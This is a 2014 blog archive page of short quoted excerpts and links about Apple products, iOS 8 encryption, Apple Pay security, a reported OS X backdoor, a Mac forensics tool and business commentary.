Archive for September 2014

Historical Look at iPhone Launch Sales [Chart]

Apple today announced 10 million iPhone 6 and iPhone 6 Plus sales on launch weekend. Here’s a historical look at launch sales for every iPhone released.

via iClarified – Apple News – Historical Look at iPhone Launch Sales [Chart].

I am also curious how these numbers are restricted by availablity

Customers Are Better Strategists Than Managers

It was after I left that job and started working as a consultant that the penny finally dropped: I realized I’d been looking at the business from the inside out. From that perspective, all I could see was the activity that consumed my day. I also realized that customers and other stakeholders have the opposite perspective. Their view is outside-in, and that’s what makes them good strategists.

via Customers Are Better Strategists Than Managers – Graham Kenny – Harvard Business Review.

iPhone 6: Preliminary Results

As one can see, it seems that Apple has managed to do something quite incredible with battery life. Normally an 1810 mAh battery with 3.82V nominal voltage would be quite a poor performer, but the iPhone 6 is a step above just about every other Android smartphone on the market.

via AnandTech | iPhone 6 and iPhone 6 Plus: Preliminary Results.

Apple Cannot Decrypt iPhones Running iOS 8 for Law Enforcement

By setting up a device passcode, the user automatically enables Data Protection. iOS supports four-digit and arbitrary-length alphanumeric passcodes. In addition to unlocking the device, a passcode provides entropy for certain encryption keys. This means an attacker in possession of a device can’t get access to data in specific protection classes without the passcode.

The passcode is entangled with the device’s UID, so brute-force attempts must be performed on the device under attack. A large iteration count is used to make each attempt slower. The iteration count is calibrated so that one attempt takes approximately 80 milliseconds. This means it would take more than 5½ years to try all combinations of a six-character alphanumeric passcode with lowercase letters and numbers.

The stronger the user passcode is, the stronger the encryption key becomes. Touch ID can be used to enhance this equation by enabling the user to establish a much stronger passcode than would otherwise be practical. This increases the effective amount of entropy protecting the encryption keys used for Data Protection, without adversely affecting the user experience of unlocking an iOS device multiple times throughout the day.

To further discourage brute-force passcode attacks, the iOS interface enforces escalating time delays after the entry of an invalid passcode at the Lock screen. Users can choose to have the device automatically wiped if the passcode is entered incorrectly after 10 consecutive attempts. This setting is also available as an administrative policy through mobile device management (MDM) and Exchange ActiveSync, and can be set to a lower threshold.On a device with an A7 or later A-series processor, the key operations are performed by the Secure Enclave, which also enforces a 5-second delay between repeated failed unlocking requests. This provides a governor against brute-force attacks in addition to safeguards enforced by iOS

http://images.apple.com/privacy/docs/iOS_Security_Guide_Sept_2014.pdf

On devices running iOS 8, your personal data such as photos, messages (including attachments), email, contacts, call history, iTunes content, notes, and reminders is placed under the protection of your passcode. Unlike our competitors, Apple cannot bypass your passcode and therefore cannot access this data. So it’s not technically feasible for us to respond to government warrants for the extraction of this data from devices in their possession running iOS 8.

OSXAuditor

OS X Auditor is a free Mac OS X computer forensics tool.

OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:

  • the kernel extensions
  • the system agents and daemons
  • the third party’s agents and daemons
  • the old and deprecated system and third party’s startup items
  • the users’ agents
  • the users’ downloaded files
  • the installed applications

It extracts:

  • the users’ quarantined files
  • the users’ Safari history, downloads, topsites, LastSession, HTML5 databases and localstore
  • the users’ Firefox cookies, downloads, formhistory, permissions, places and signons
  • the users’ Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
  • the users’ social and email accounts
  • the WiFi access points the audited system has been connected to (and tries to geolocate them)
  • It also looks for suspicious keywords in the .plist themselves.

via jipegit/OSXAuditor.

Apple (AAPL) Back Above the $600 Billion Mark

30 largest spx

After moving back above the $100/share level today, Apple (AAPL) is back over the $600 billion mark as well.  This puts it nearly $180 billion larger than Exxon Mobil (XOM), the next largest company in the US.  The difference in market cap between Apple and Exxon is equivalent to the size of AT&T, the 19th largest company in the country!

via Bespoke Investment Group – Think BIG – Apple (AAPL) Back Above the $600 Billion Mark; Two Tech Stocks Creep Up on Exxon Mobil.

iPhone Framentation begins

With the announcements this week, Apple now sells iOS devices at the following sizes:

4″ (iPhone 5c and iPhone 5S)

4.7″ (iPhone 6)

5.5″ (iPhone 6 Plus)

7.9″ (iPad mini with Retina display and iPad mini)

9.7″ (iPad Air and iPad with Retina display)

This graphic — by the wonderful Underscore David Smith — shows all of this visually.

It’s clear Apple’s trying to make a smooth range of device sizes. With rumors of a larger iPad floating around, this trend may only continue.

via Plus or minus — 512 Pixels.

How Safe Can Apple Pay Really Be?

The most worrisome point of vulnerability in an Apple Pay transaction, however, is the NFC transmission itself. Bestuzhev said that NFC transmissions are just like any other data transfer. “It sends and receives information which can be intercepted, he said.

This has been proven. A couple of years ago a former NSA analyst turned white hat hacker found a couple of really serious vulnerabilities in the NFC system. At the Black Hat conference, he demonstrated to a live audience how he could hijack an NFC-enabled device by simply waving a tag with an embedded NFC chip inside of it. The same kind of tag could also be used to send someone’s browser to a URL address, perhaps one that downloads malware onto the phone.

These aren’t problems specific to Apple Pay; you run the same risk with Google Wallet, Softcard, or any other mobile payment plan that relies on NFC. And while Apple has taken some steps to protect against that—including assigning unique codes to every transaction—there’s only so much you can do when the fundamental technology is vulnerable.

via How Safe Can Apple Pay Really Be?.

Cyberespionage group starts ports Windows backdoor to Mac OS X

“The backdoor code was ported to OS X from a Windows backdoor that has been used extensively in targeted attacks over the past several years, having been updated many times in the process,” security researchers from FireEye said Thursday in a blog post.

The malicious program is dubbed XSLCmd and is capable of opening a reverse shell, listing and transferring files and installing additional malware on an infected computer. The OS X variant can also log keystrokes and capture screen shots, the FireEye researchers said.

When installed on a Mac the malware copies itself to /Library/Logs/clipboardd and $HOME/Library/LaunchAgents/clipboardd. It also creates a com.apple.service.clipboardd.plist file to ensure its execution after system reboots.

The malware contains code that checks the OS X version, but does not account for versions above 10.8 (Mountain Lion). This suggests that version 10.8 was either the latest OS X version when the program was written or at least the most common one used by its intended targets.

The XSLCmd backdoor was created and is used by a cyberespionage group that has been operating since at least 2009 and has been dubbed GREF by the FireEye researchers. “Historically, GREF has targeted a wide range of organizations including the US Defense Industrial Base (DIB), electronics and engineering companies worldwide, as well as foundations and other NGOs, especially those with interests in Asia,” they said.

via Cyberespionage group starts ports Windows backdoor to Mac OS X | Macworld.

What’s wrong with your website?

Not much.

In real life, it’s not unusual for one in four people who walk into your store to buy from you. Not unusual for every friend you call on the phone to have an actual conversation with you. Not surprising that most people you ask on a date say yes, or at least politely decline.

In direct mail, you’re doing well if only 99 people out of a hundred say no. Not 25%, but 1% success.

Online, though, the numbers are far worse. It’s not unusual for a thousand people to visit your website before someone buys something. It’s not news if you ask 5,000 Twitter followers to do something and they all refuse to take action.

Too much noise, too many choices, and most of all, too many people asking for everything, all the time.

People won’t click all the things they can click, ever. They won’t get three or four or nine clicks into your site no matter how responsive, webkitted and user tested your site is.

Sure, you can probably make it better.

Someone who’s really good at it can probably make it measurably better.

But don’t beat yourself up that it’s not converting. By real-life definitions, nothing online converts.

The secret is maximizing the things that can’t work in real life. The viral effects, the upside of remarkable products and services, the horizontal movement of ideas, from person to person, not from you to the market.

via Seth’s Blog: What’s wrong with your website?.